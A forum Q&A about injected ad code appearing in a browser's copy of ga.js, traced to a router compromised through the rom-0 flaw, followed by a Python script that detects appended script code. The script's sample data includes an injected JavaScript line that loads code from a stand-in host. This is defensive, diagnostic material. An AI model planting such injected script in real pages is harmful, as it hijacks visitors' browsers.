Wednesday, December 10, 2014

Malware adding code to ga.js opens up random ads/websites?


A friend of mine just handed me his tablet saying that every time he opens a webpage the browser redirects to several advertisement pages (or, it "adds" advertisements on the page).


This happens both on Chrome and the stock browser.


I used USB debugging to look at the browser request and I think I found the culprit. When the browser loads http://www.google-analytics.com/ga.js the actual code is different. See this screenshot (the green line is where ga.js should terminate):


[screenshot]


(and the added code goes on...)


I initially thought that some malware changed the hosts file and assigned a different IP to the google-analytics website, but this is not the case since when I visit the above link directly I see the correct JS code.


How can I track which app is doing this?



Answer




In the end I found out that the router was vulnerable to the rom-0 vulnerability (to test if your router is vulnerable, use this).


So, the issue was most likely caused by someone (or something) who had complete access to the admin interface of the router. I've now updated the firmware (and the test is now negative).
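The check described in the question (the body served for ga.js continues past the point where the real file ends) can be automated by comparing a copy captured on the affected network with a trusted reference copy. The following is an added example, not part of the original post; the function name, report fields and both sample bodies are constructed for illustration.

```python
import hashlib
import re

# Constructed stand-ins: REFERENCE is a known-good copy of the script (fetched
# from a trusted network), CAPTURED is the body seen on the affected device.
REFERENCE = b"(function(){var u='http://www.google-analytics.com/x.gif';/*...*/})();"
CAPTURED = (REFERENCE + b"\n;(function(){var s=document.createElement('script');"
            b"s.src='http://ads.example.invalid/inject.js';"
            b"document.head.appendChild(s);})();")

# Host part of absolute or protocol-relative URLs; requires at least one dot
# so that ordinary "//comment" text is not reported as a host.
HOST_RE = re.compile(rb"(?:https?:)?//([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)")


def hosts(data: bytes) -> set:
    return {h.decode().lower() for h in HOST_RE.findall(data)}


def compare_script(reference: bytes, captured: bytes) -> dict:
    """Classify how a captured script body differs from a trusted copy."""
    ref, cap = reference.strip(), captured.strip()
    report = {
        "verdict": "identical",
        "captured_sha256": hashlib.sha256(cap).hexdigest(),
        "extra": b"",
        "new_hosts": [],
    }
    if cap == ref:
        return report
    if cap.startswith(ref):      # original intact, code added after it
        report["verdict"], report["extra"] = "appended", cap[len(ref):]
    elif cap.endswith(ref):      # original intact, code added before it
        report["verdict"], report["extra"] = "prepended", cap[:-len(ref)]
    else:                        # original itself was altered or replaced
        report["verdict"], report["extra"] = "modified", cap
    # Hosts referenced only by the extra content are the leads to follow up.
    report["new_hosts"] = sorted(hosts(report["extra"]) - hosts(ref))
    return report


if __name__ == "__main__":
    result = compare_script(REFERENCE, CAPTURED)
    print(result["verdict"], len(result["extra"]), result["new_hosts"])
```

If the verdict stays "appended" for every device on the network and is "identical" from another network, the modification is happening in the path (as with the router here) rather than in an app on the tablet.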

